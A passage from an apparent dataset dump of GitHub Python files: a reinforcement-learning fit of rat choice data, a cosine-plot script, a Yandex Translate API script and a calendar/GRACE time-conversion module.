mode, set mode to 1, 2 or 4!\"\n self.mode = mode\n\n def getProbabilities(self, sequence):\n # Calculate P_L and P_R from values\n V_L, V_R = self.values[self.possible_sequence.index(sequence)]\n Z = self.beta * (V_L - V_R)\n P_L = 1 / (1 + np.exp(-1 * Z))\n return P_L, 1-P_L\n\n def makeSelection(self, sequence):\n P_L, P_R = self.getProbabilities(sequence)\n if random.uniform(0, 1) <= P_L:\n return 0, \"L\"\n else:\n return 1, \"R\"\n\n def upgradeValues(self, sequence, response, reward):\n self.values_history[0][0].append(self.values[0][0])\n self.values_history[1][0].append(self.values[1][0])\n self.values_history[1][1].append(self.values[1][1])\n self.values_history[0][1].append(self.values[0][1])\n\n idx_seq = self.possible_sequence.index(sequence)\n idx_seq_re = abs(1 - idx_seq)\n idx_res = self.possible_response.index(response)\n idx_res_re = abs(1 - idx_res)\n\n self.values[idx_seq][idx_res] = self.values[idx_seq][idx_res] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (reward - self.values[idx_seq][idx_res])\n\n if self.mode >= 2:\n self.values[idx_seq_re][idx_res] = self.values[idx_seq_re][idx_res] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (reward - self.values[idx_seq_re][idx_res])\n\n if self.mode == 4:\n self.values[idx_seq][idx_res_re] = self.values[idx_seq][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq] * \\\n (1 - reward - self.values[idx_seq][idx_res_re])\n\n self.values[idx_seq_re][idx_res_re] = self.values[idx_seq_re][idx_res_re] + \\\n self.alphas[idx_seq][idx_seq_re] * \\\n (1 - reward - self.values[idx_seq_re][idx_res_re])\n\n\nclass probabilityCalculator():\n def __init__(self, subject_no=9, mode=2, assist_alpha=True):\n data_filename = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/Result/\" \\\n \"SingleContext_Rat\" + str(subject_no) + \".csv\"\n self.df = pd.read_csv(data_filename, sep=\",\")\n subject_name = data_filename.split(\"_\")[-1]\n self.subject_name = subject_name.split(\".\")[0]\n self.mode=mode\n self.subject_no = subject_no\n self.assist_alpha = assist_alpha\n\n def _calcEngine(self, alpha_starts = [[0,0],[0,0]], alpha_ends=[[1,1],[1,1]], step=0.1):\n result_df = pd.DataFrame(columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n name = self.subject_name\n alphas = [[1,2],[3,4]]\n for i in [0,1]:\n for j in [0,1]:\n alphas[i][j] = np.arange(np.max([alpha_starts[i][j],0]),\n np.min([1,alpha_ends[i][j]]), step)\n if not self.assist_alpha:\n alphas[0][1] = np.array([0])\n alphas[1][0] = np.array([0])\n print(\"alphas created\")\n\n for i, alpha_00 in enumerate(alphas[0][0]):\n print(\"Alpha_00: {v:.3f}, {i}/{j}\".format(v=alpha_00, i=i+1, j=len(alphas[0][0])))\n for alpha_01 in alphas[0][1]:\n for alpha_10 in alphas[1][0]:\n for alpha_11 in alphas[1][1]:\n alphas2use = [[alpha_00, alpha_01],[alpha_10, alpha_11]]\n probability_sum = 0.0\n\n if self.subject_no <= 16:\n p = participant(name=name, values=[[1,0],[1,0]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n else:\n p = participant(name=name, values=[[0,1],[0,1]],\n alphas=alphas2use, beta=1.0, mode=self.mode)\n\n #print(\"Alphas: {a}\".format(a=alphas2use))\n for i in range(len(self.df)):\n seq_trial = self.df[\"Sequence\"].iloc[i]\n res_trial = self.df[\"Response\"].iloc[i]\n reward = self.df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n prob_trial = p.getProbabilities(seq_trial)\n probability_sum = probability_sum + np.log(prob_trial[p.possible_response.index(res_trial)])\n p.upgradeValues(seq_trial, res_trial, reward)\n\n df_try = pd.DataFrame([[alpha_00, alpha_01, alpha_10, alpha_11, probability_sum]],\n columns=[\"Alpha_00\",\"Alpha_01\",\"Alpha_10\",\"Alpha_11\",\"Ln_Likelyhood\"])\n result_df = result_df.append(df_try)\n\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].values[0],result_df[\"Alpha_01\"].loc[idx].values[0]],\\\n [result_df[\"Alpha_10\"].loc[idx].values[0],result_df[\"Alpha_11\"].loc[idx].values[0]]]\n return best_alphas, result_df\n\n\nrootpath = \"/media/zhemengwu/Gigantic Data/SingleContextSequence/RL_Model\"\nif not os.path.exists(rootpath):\n os.mkdir(rootpath)\n\n#for subject_no in np.arange(12,13,1):\nsubject_all = np.arange(9, 25, 1)\nsubject_all = subject_all[subject_all != 18]\nfor subidx, subject_no in enumerate(subject_all):\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n for mode in [1,2,3,4]:\n print(\"=\"*30)\n print(\"Subject {s}, {i}/15; mode: {m}\".format(s=subject_no, i=subidx+1, m=mode))\n if mode == 1:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=2, assist_alpha=False)\n elif mode == 3:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=4, assist_alpha=False)\n else:\n Pcalculator = probabilityCalculator(subject_no=subject_no, mode=mode, assist_alpha=True)\n\n alpha_starts = [[0, 0], [0, 0]]\n alpha_ends = [[1, 1], [1, 1]]\n for i, step in enumerate([0.1,0.02,0.004,0.001]):\n print(\"Cycle {i}...\".format(i=i+1))\n best_alphas, result_df = Pcalculator._calcEngine(alpha_starts=alpha_starts, alpha_ends=alpha_ends, step=step)\n print(best_alphas)\n filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle{i}.csv\".format(s=subject_no, m=mode, i=i+1))\n with open(filename, \"w\") as f:\n f.write(result_df.to_csv(index=False))\n alpha_starts = np.array(best_alphas) - step\n alpha_ends = np.array(best_alphas) + step\n\n\n###################################################33\n# Output results\ncolumns = [\"Subject\", \"N_Trials\",\n \"Mode1_LnLikelyhood\", \"Mode1_LnLikelyhood_Pertrial\",\n \"Mode1_Alpha_00\",\"Mode1_Alpha_01\", \"Mode1_Alpha_10\",\"Mode1_Alpha_11\",\n \"Mode2_LnLikelyhood\", \"Mode2_LnLikelyhood_Pertrial\",\n \"Mode2_Alpha_00\",\"Mode2_Alpha_01\", \"Mode2_Alpha_10\",\"Mode2_Alpha_11\",\n \"Mode3_LnLikelyhood\", \"Mode3_LnLikelyhood_Pertrial\",\n \"Mode3_Alpha_00\",\"Mode3_Alpha_01\", \"Mode3_Alpha_10\",\"Mode3_Alpha_11\",\n \"Mode4_LnLikelyhood\", \"Mode4_LnLikelyhood_Pertrial\",\n \"Mode4_Alpha_00\",\"Mode4_Alpha_01\", \"Mode4_Alpha_10\",\"Mode4_Alpha_11\"]\ndf_sum = pd.DataFrame(columns=columns)\n\nfor subject_no in subject_all:\n if not os.path.exists(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no))):\n os.mkdir(os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no)))\n\n session_df_file = os.path.join(\"/media/zhemengwu/Gigantic Data/SingleContextSequence\",\n \"Result\", \"SingleContext_Rat{s}.csv\".format(s=subject_no))\n session_df = pd.read_csv(session_df_file, sep=\",\")\n session_df = session_df.loc[session_df[\"Response\"] != \"N\"]\n sub_name = \"Rat_{s}\".format(s=subject_no)\n n_trials = len(session_df)\n values = [sub_name, n_trials]\n\n for mode in [1,2,3,4]:\n print(\"=\" * 30)\n print(\"Subject {s}, mode: {m}\".format(s=subject_no, m=mode))\n\n # get mode2use and best-alphas\n if mode in [1,3]:\n mode2use = mode + 1\n else:\n mode2use = mode\n\n alpha_filename = os.path.join(rootpath,\n \"Rat_{s}\".format(s=subject_no),\n \"Rat{s}_Mode{m}_Cycle4.csv\".format(s=subject_no, m=mode))\n result_df = pd.read_csv(alpha_filename, sep=\",\")\n idx = result_df[\"Ln_Likelyhood\"] == result_df[\"Ln_Likelyhood\"].max()\n best_alphas = [[result_df[\"Alpha_00\"].loc[idx].median(), result_df[\"Alpha_01\"].loc[idx].median()], \\\n [result_df[\"Alpha_10\"].loc[idx].median(), result_df[\"Alpha_11\"].loc[idx].median()]]\n # apend values for df_sum\n values.append(result_df[\"Ln_Likelyhood\"].max())\n values.append(result_df[\"Ln_Likelyhood\"].max() / n_trials)\n values.append(result_df[\"Alpha_00\"].loc[idx].median())\n values.append(result_df[\"Alpha_01\"].loc[idx].median())\n values.append(result_df[\"Alpha_10\"].loc[idx].median())\n values.append(result_df[\"Alpha_11\"].loc[idx].median())\n\n # re-calculate values\n if subject_no <= 16:\n rat = participant(name=sub_name, values=[[1,0],[1,0]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n else:\n rat = participant(name=sub_name, values=[[0,1],[0,1]],\n alphas=best_alphas, beta=1.0, mode=mode2use)\n seqA_X, seqA_Y = [], []\n seqB_X, seqB_Y = [], []\n for i in range(len(session_df)):\n seq_trial = session_df[\"Sequence\"].iloc[i]\n res_trial = session_df[\"Response\"].iloc[i]\n reward = session_df[\"Correct\"].iloc[i]\n if res_trial in [\"L\", \"R\"]:\n rat.upgradeValues(seq_trial, res_trial, reward)\n if seq_trial == \"A\":\n seqA_X.append(i)\n seqA_Y.append(reward)\n else:\n seqB_X.append(i)\n seqB_Y.append(reward)\n # other parameter for plot\n x_plot = np.arange(len(session_df))\n\n # Sequence A Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax1 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"b\")\n ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"r\")\n else:\n ax1.plot(x_plot, np.array(rat.values_history[0][0]), \"r\")\n ax1.plot(x_plot, np.array(rat.values_history[0][1]), \"b\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqA_X, seqA_Y):\n ax1.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax1.set_xlabel(\"Sequences A Values\", fontsize=12)\n ax1.set_ylim([-0.03,1.03])\n ax1.set_xlim([0, n_trials])\n ax1.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceA_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n # Sequence B Values\n fig = plt.figure(figsize=(12, 6), dpi=200)\n ax2 = fig.add_subplot(1, 1, 1)\n if subject_no <= 16:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"r\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"b\")\n else:\n ax2.plot(x_plot, np.array(rat.values_history[1][0]), \"b\")\n ax2.plot(x_plot, np.array(rat.values_history[1][1]), \"r\")\n colormap = [\"r\", \"b\"]\n shapemap = [\"x\", \"o\"]\n for x, y in zip(seqB_X, seqB_Y):\n ax2.scatter(x, (y-0.5) * 1.05 + 0.5, color=colormap[y], marker=shapemap[y], s=5)\n ax2.set_xlabel(\"Sequences B Values\", fontsize=12)\n ax2.set_ylim([-0.03,1.03])\n ax2.set_xlim([0, n_trials])\n ax2.grid()\n filename = os.path.join(rootpath, \"Rat_{s}\".format(s=subject_no), \"SequenceB_Mode{m}.png\".format(m=mode))\n plt.savefig(filename)\n plt.close(fig)\n\n df2add = pd.DataFrame([values], columns=columns)\n df_sum = df_sum.append(df2add, ignore_index=True)\n\nwith open(os.path.join(rootpath, \"Summary.csv\"), \"w\") as f:\n f.write(df_sum.to_csv(index=False))\n\n\n\n\n\n", "repo_name": "HaoyuFan-DIB/RatChoice", "sub_path": "RL_Model/RL_Model.py", "file_name": "RL_Model.py", "file_ext": "py", "file_size_in_byte": 14389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.exp", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 300, "usage_type": "call"}, {"api_name": "os.path", "line_number": 300, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}]} +{"seq_id": "5197869489", "text": "import matplotlib.pyplot as plot\nimport numpy as np\n\nx = np.arange(0, 10, 0.1)\ny = np.cos(1*x)\nz = np.cos(3*x)\n\nplot.plot(x,y)\nplot.plot(x,z)\nplot.show()\n\n", "repo_name": "esineokov/ml", "sub_path": "math/lesson/1/4.py", "file_name": "4.py", "file_ext": "py", "file_size_in_byte": 155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.arange", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "34211031227", "text": "import requests\n# документация https://yandex.ru/dev/translate/doc/dg/reference/translate-docpage/\n\nAPI_KEY = ''\nURL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\ndef translate_it(text, lang, to_lang):\n \"\"\"\n https://translate.yandex.net/api/v1.5/tr.json/translate ?\n key=\n & text=<переводимый текст>\n & lang=<направление перевода>\n & [format=<формат текста>]\n & [options=<опции перевода>]\n & [callback=<имя callback-функции>]\n :param to_lang:\n :return:\n \"\"\"\n\n params = {\n 'key': API_KEY,\n 'text': text,\n 'lang': '{}-{}'.format(lang, to_lang),\n }\n\n response = requests.get(URL, params=params)\n json_ = response.json()\n return ''.join(json_['text'])\n\n\n# print(translate_it('В настоящее время доступна единственная опция — признак включения в ответ автоматически определенного языка переводимого текста. \n# Этому соответствует значение 1 этого параметра.', 'no'))\n\ndef open_txt(file_name):\n with open(file_name, 'r', encoding='utf-8') as f:\n data = [l.strip() for l in f]\n return data\n\ndef write_txt(file_name, data):\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(data)\n\n\ntranslated_data_de = translate_it(open_txt('DE.txt'), 'de', 'ru')\nprint(translated_data_de)\nwrite_txt('TranslatedDE.txt', translated_data_de)\n\ntranslated_data_es = translate_it(open_txt('ES.txt'), 'es', 'ru')\nprint(translated_data_es)\nwrite_txt('TranslatedES.txt', translated_data_es)\n\ntranslated_data_fr = translate_it(open_txt('FR.txt'), 'fr', 'ru')\nprint(translated_data_fr)\nwrite_txt('TranslatedFR.txt', translated_data_fr)\n\n\n", "repo_name": "m1amgn/ya_api_translate", "sub_path": "yandex_translate_hw.py", "file_name": "yandex_translate_hw.py", "file_ext": "py", "file_size_in_byte": 1879, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "18913289060", "text": "#!/usr/bin/env python\nu\"\"\"\ntime.py\nWritten by Tyler Sutterley (11/2021)\nUtilities for calculating time operations\n\nPYTHON DEPENDENCIES:\n numpy: Scientific Computing Tools For Python\n https://numpy.org\n dateutil: powerful extensions to datetime\n https://dateutil.readthedocs.io/en/stable/\n\nUPDATE HISTORY:\n Updated 11/2021: added function for calendar year (decimal) to Julian Day \n Updated 09/2021: add functions for converting to and from GRACE months\n Updated 05/2021: define int/float precision to prevent deprecation warning\n Updated 02/2021: added adjust_months function to fix special months cases\n Updated 01/2021: add date parser for cases when only a date and no units\n Updated 12/2020: merged with convert_julian and convert_calendar_decimal\n added calendar_days routine to get number of days per month\n Updated 09/2020: parse date strings \"time-units since yyyy-mm-dd hh:mm:ss\"\n Updated 08/2020: added NASA Earthdata routines for downloading from CDDIS\n Written 07/2020\n\"\"\"\nimport datetime\nimport numpy as np\nimport dateutil.parser\n\n#-- PURPOSE: parse a date string into epoch and units scale\ndef parse_date_string(date_string):\n \"\"\"\n parse a date string of the form time-units since yyyy-mm-dd hh:mm:ss\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n\n Returns\n -------\n epoch of delta time\n multiplication factor to convert to seconds\n \"\"\"\n #-- try parsing the original date string as a date\n try:\n epoch = dateutil.parser.parse(date_string)\n except ValueError:\n pass\n else:\n #-- return the epoch (as list)\n return (datetime_to_list(epoch),0.0)\n #-- split the date string into units and epoch\n units,epoch = split_date_string(date_string)\n conversion_factors = {'microseconds': 1e-6,'microsecond': 1e-6,\n 'microsec': 1e-6,'microsecs': 1e-6,\n 'milliseconds': 1e-3,'millisecond': 1e-3,'millisec': 1e-3,\n 'millisecs': 1e-3,'msec': 1e-3,'msecs': 1e-3,'ms': 1e-3,\n 'seconds': 1.0,'second': 1.0,'sec': 1.0,'secs': 1.0,'s': 1.0,\n 'minutes': 60.0,'minute': 60.0,'min': 60.0,'mins': 60.0,\n 'hours': 3600.0,'hour': 3600.0,'hr': 3600.0,\n 'hrs': 3600.0,'h': 3600.0,\n 'day': 86400.0,'days': 86400.0,'d': 86400.0}\n if units not in conversion_factors.keys():\n raise ValueError('Invalid units: {0}'.format(units))\n #-- return the epoch (as list) and the time unit conversion factors\n return (datetime_to_list(epoch),conversion_factors[units])\n\n#-- PURPOSE: split a date string into units and epoch\ndef split_date_string(date_string):\n \"\"\"\n split a date string into units and epoch\n\n Arguments\n ---------\n date_string: time-units since yyyy-mm-dd hh:mm:ss\n \"\"\"\n try:\n units,_,epoch = date_string.split(None,2)\n except ValueError:\n raise ValueError('Invalid format: {0}'.format(date_string))\n else:\n return (units.lower(),dateutil.parser.parse(epoch))\n\n#-- PURPOSE: convert a datetime object into a list\ndef datetime_to_list(date):\n \"\"\"\n convert a datetime object into a list [year,month,day,hour,minute,second]\n\n Arguments\n ---------\n date: datetime object\n \"\"\"\n return [date.year,date.month,date.day,date.hour,date.minute,date.second]\n\n#-- PURPOSE: Adjust GRACE/GRACE-FO months to fix \"Special Cases\"\ndef adjust_months(grace_month):\n \"\"\"\n Adjust estimated GRACE/GRACE-FO months to fix \"Special Cases\"\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO months\n\n The \"Special Months\" (Nov 2011, Dec 2011 and April 2012) with\n Accelerometer shutoffs make the relation between month number\n and date more complicated as days from other months are used\n For CSR and GFZ: Nov 2011 (119) is centered in Oct 2011 (118)\n For JPL: Dec 2011 (120) is centered in Jan 2012 (121)\n For all: May 2015 (161) is centered in Apr 2015 (160)\n For GSFC: Oct 2018 (202) is centered in Nov 2018 (203)\n \"\"\"\n #-- verify dimensions\n grace_month = np.atleast_1d(grace_month)\n #-- number of months\n nmon = len(grace_month)\n #-- create temporary months object\n m = np.zeros_like(grace_month)\n #-- find unique months\n _,i,c = np.unique(grace_month,return_inverse=True,return_counts=True)\n #-- simple unique months case\n case1, = np.nonzero(c[i] == 1)\n m[case1] = grace_month[case1]\n #-- Special Months cases\n case2, = np.nonzero(c[i] == 2)\n #-- for each special case month\n for j in case2:\n # prior month, current month, subsequent 2 months\n mm1 = grace_month[j-1]\n mon = grace_month[j]\n mp1 = grace_month[j+1] if (j < (nmon-1)) else (mon + 1)\n mp2 = grace_month[j+2] if (j < (nmon-2)) else (mp1 + 1)\n #-- determine the months which meet the criteria need to be adjusted\n if (mon == (mm1 + 1)):\n #-- case where month is correct\n #-- but subsequent month needs to be +1\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1) and (mon != m[j-1]):\n #-- case where prior month needed to be -1\n #-- but current month is correct\n m[j] = np.copy(grace_month[j])\n elif (mon == mm1):\n #-- case where month should be +1\n m[j] = grace_month[j] + 1\n elif (mon == mp1) and ((mon == (mm1 + 2)) or (mp2 == (mp1 + 1))):\n #-- case where month should be -1\n m[j] = grace_month[j] - 1\n #-- update months and remove singleton dimensions if necessary\n return np.squeeze(m)\n\n#-- PURPOSE: convert calendar dates to GRACE/GRACE-FO months\ndef calendar_to_grace(year,month=1,around=np.floor):\n \"\"\"\n Converts calendar dates to GRACE/GRACE-FO months\n\n Arguments\n ---------\n year: calendar year\n\n Keyword arguments\n -----------------\n month: calendar month\n around: method of rounding to nearest method\n\n Returns\n -------\n grace_month: GRACE/GRACE-FO month\n \"\"\"\n grace_month = around(12.0*(year - 2002.0)) + month\n return np.array(grace_month,dtype=int)\n\n#-- PURPOSE: convert GRACE/GRACE-FO months to calendar dates\ndef grace_to_calendar(grace_month):\n \"\"\"\n Converts GRACE/GRACE-FO months to calendar dates\n\n Arguments\n ---------\n grace_month: GRACE/GRACE-FO month\n\n Returns\n -------\n year: calendar year\n month: calendar month\n \"\"\"\n year = np.array(2002 + (grace_month-1)//12).astype(int)\n month = np.mod(grace_month-1,12) + 1\n return (year, month)\n\n#-- PURPOSE: convert calendar dates to Julian days\ndef calendar_to_julian(year_decimal):\n \"\"\"\n Converts calendar dates to Julian days\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n \"\"\"\n #-- calculate year\n year = np.floor(year_decimal)\n #-- calculation of day of the year\n dpy = calendar_days(year).sum()\n DofY = dpy*(year_decimal % 1)\n #-- Calculation of the Julian date from year and DofY\n JD = np.array(367.0*year - np.floor(7.0*year/4.0) -\n np.floor(3.0*(np.floor((7.0*year - 1.0)/700.0) + 1.0)/4.0) +\n DofY + 1721058.5, dtype=np.float64)\n return JD\n\n#-- PURPOSE: gets the number of days per month for a given year\ndef calendar_days(year):\n \"\"\"\n Calculates the number of days per month for a given year\n\n Arguments\n ---------\n year: calendar year\n\n Returns\n -------\n dpm: number of days for each month\n \"\"\"\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 28)\n dpm_leap = np.array([31,29,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n dpm_stnd = np.array([31,28,31,30,31,30,31,31,30,31,30,31],dtype=np.float64)\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (year % 4)\n m100 = (year % 100)\n m400 = (year % 400)\n m4000 = (year % 4000)\n #-- find indices for standard years and leap years using criteria\n if ((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0)):\n return dpm_leap\n elif ((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0)):\n return dpm_stnd\n\n#-- PURPOSE: convert times from seconds since epoch1 to time since epoch2\ndef convert_delta_time(delta_time, epoch1=None, epoch2=None, scale=1.0):\n \"\"\"\n Convert delta time from seconds since epoch1 to time since epoch2\n\n Arguments\n ---------\n delta_time: seconds since epoch1\n\n Keyword arguments\n -----------------\n epoch1: epoch for input delta_time\n epoch2: epoch for output delta_time\n scale: scaling factor for converting time to output units\n \"\"\"\n epoch1 = datetime.datetime(*epoch1)\n epoch2 = datetime.datetime(*epoch2)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- subtract difference in time and rescale to output units\n return scale*(delta_time - delta_time_epochs)\n\n#-- PURPOSE: calculate the delta time from calendar date\n#-- http://scienceworld.wolfram.com/astronomy/JulianDate.html\ndef convert_calendar_dates(year, month, day, hour=0.0, minute=0.0, second=0.0,\n epoch=(1992,1,1,0,0,0), scale=1.0):\n \"\"\"\n Calculate the time in time units since epoch from calendar dates\n\n Arguments\n ---------\n year: calendar month\n month: month of the year\n day: day of the month\n\n Keyword arguments\n -----------------\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n epoch: epoch for output delta_time\n scale: scaling factor for converting days to output units\n\n Returns\n -------\n delta_time: days since epoch\n \"\"\"\n #-- calculate date in Modified Julian Days (MJD) from calendar date\n #-- MJD: days since November 17, 1858 (1858-11-17T00:00:00)\n MJD = 367.0*year - np.floor(7.0*(year + np.floor((month+9.0)/12.0))/4.0) - \\\n np.floor(3.0*(np.floor((year + (month - 9.0)/7.0)/100.0) + 1.0)/4.0) + \\\n np.floor(275.0*month/9.0) + day + hour/24.0 + minute/1440.0 + \\\n second/86400.0 + 1721028.5 - 2400000.5\n epoch1 = datetime.datetime(1858,11,17,0,0,0)\n epoch2 = datetime.datetime(*epoch)\n delta_time_epochs = (epoch2 - epoch1).total_seconds()\n #-- return the date in days since epoch (or scaled to units)\n return scale*np.array(MJD - delta_time_epochs/86400.0,dtype=np.float64)\n\n#-- PURPOSE: Converts from calendar dates into decimal years\ndef convert_calendar_decimal(year, month, day=None, hour=None, minute=None,\n second=None, DofY=None):\n \"\"\"\n Converts from calendar date into decimal years taking into\n account leap years\n\n Dershowitz, N. and E.M. Reingold. 2008. Calendrical Calculations.\n Cambridge: Cambridge University Press.\n\n Arguments\n ---------\n year: calendar year\n month: calendar month\n\n Keyword arguments\n -----------------\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n DofY: day of the year (January 1 = 1)\n\n Returns\n -------\n t_date: date in decimal-year format\n \"\"\"\n\n #-- number of dates\n n_dates = len(np.atleast_1d(year))\n\n #-- create arrays for calendar date variables\n cal_date = {}\n 